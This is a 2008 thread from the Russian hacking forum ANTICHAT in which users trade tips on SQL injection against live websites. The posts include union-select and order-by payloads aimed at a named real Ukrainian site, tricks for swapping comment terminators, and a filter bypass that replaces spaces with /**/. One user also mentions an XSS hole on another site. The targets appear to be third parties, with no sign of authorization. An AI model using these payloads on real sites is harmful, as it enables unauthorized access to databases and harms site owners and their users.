ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.09.2008, 00:23
|
|
Новичок
Регистрация: 21.09.2008
Сообщений: 9
Провел на форуме:
69313
Репутация:
1
|
|
если даже так разницы нет)
А да и еще на сайте есть XSS
http://сайт/id=[XSS]/*
Последний раз редактировалось IND1G0; 25.09.2008 в 00:30..
|
|
|
25.09.2008, 00:28
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Ссылку хоть дай
|
|
|
|
25.09.2008, 00:28
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036
Репутация:
1334
|
|
А оставить ковычку пробывал?
|
|
|
|
25.09.2008, 00:36
|
|
Новичок
Регистрация: 21.09.2008
Сообщений: 9
Провел на форуме:
69313
Репутация:
1
|
|
Да уже все перепробовал...
Мне интересно почему висит вот эта ошибка постоянно независимо от того что вбивать в http://сайт/id=/*
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16
|
|
|
|
25.09.2008, 01:26
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
Сообщение от IND1G0
Да уже все перепробовал...
Мне интересно почему висит вот эта ошибка постоянно независимо от того что вбивать в http://сайт/id=/*
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16
Попробуй использовать такой комент "--" вместо "/*"
|
|
|
|
25.09.2008, 01:34
|
|
Новичок
Регистрация: 21.09.2008
Сообщений: 9
Провел на форуме:
69313
Репутация:
1
|
|
Сообщение от MirA
Попробуй использовать такой комент "--" вместо "/*"
тоже уже пробовал
|
|
|
|
25.09.2008, 04:02
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
а ещё вот такой +--+
и проверь на раскрытые скобки в запросе. Попробуй проанализировать, что там фильтруется
|
|
|
|
25.09.2008, 13:05
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954
Репутация:
32
|
|
Помогите SQL-inj
Вот кол-во столбцов вроде подобрал
PHP код:
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+order+by+21/*
но так нехочет:
PHP код:
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
|
|
|
|
25.09.2008, 13:38
|
|
Новичок
Регистрация: 19.09.2007
Сообщений: 12
Провел на форуме:
324160
Репутация:
19
|
|
Сообщение от IND1G0
http://сайт/id=0+union+select+1/*
Выводит
(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16
Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?
Попробуй вместо пробелов /**/
id=0/**/union/**/select/**/1/*
|
|
|
|
25.09.2008, 13:51
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
у меня была такая же трабла с запросом. Когда подставляешь ` (обратную кавычку) то результат меняется...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для DJ ][akep](/avatars/avatar48987.jpg?879395){kind=avatar}
Похожие темы
Линейный вид
